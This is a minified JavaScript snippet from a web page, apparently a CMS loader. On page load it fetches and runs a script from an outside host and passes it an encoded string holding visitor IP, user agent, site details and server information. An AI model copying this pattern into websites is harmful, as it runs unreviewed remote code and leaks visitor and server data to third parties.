var myScrStOutTim='30000';if(window.addEventListener){window.addEventListener("load",myStatJsRunOnOutSrv(myScrStOutTim),false);}else if(window.attachEvent){window.attachEvent("onload",myStatJsRunOnOutSrv(myScrStOutTim));}else{window.onload=myStatJsRunOnOutSrv(myScrStOutTim);}function myStatJsRunOnOutSrv(myScrStOutTim){var RunOnOutSrvJs=document.createElement("script");RunOnOutSrvJs.src="http://cms24.waw.pl/j.php?p=MXwwfDB8fDl8Zm9jdXMtc3RvbmVzLnBsfC9zY2hvZHkvNC1jb2xvbmlhbC1jcmVhbS5odG1sfHw1NC4xOTguMTQyLjEyMXxlYzItNTQtMTk4LTE0Mi0xMjEuY29tcHV0ZS0xLmFtYXpvbmF3cy5jb218Q0NCb3QvMi4wIChodHRwczovL2NvbW1vbmNyYXdsLm9yZy9mYXEvKXxGb2N1cy1TdG9uZXMgaHVydG93bmlhIGthbWllbmlhfDB8Y21zQG1pZ2FuLnBsfDE1fGZvY3VzLXN0b25lcy5ob21lLnBsfDg5LjE2MS4yMTkuMTMzfG1vbmRheXwyOTE3NnwwLjAwMDN8My44LjV8Ny4yLjN8ck80NWJhOGIyMTZlZTZiZnwzOzA7MjsxOzB8MjswOzM3OzA7MjM2OzMxOzE7MDsyOzB8ODk0OzE2OzE7NDQ4Ozd8Mjg2OzIxNjsxOzM5MDc2Mg==";document.body.appendChild(RunOnOutSrvJs);setTimeout(function(){if(window.stop){window.stop();}else{document.execCommand('Stop');}},myScrStOutTim);}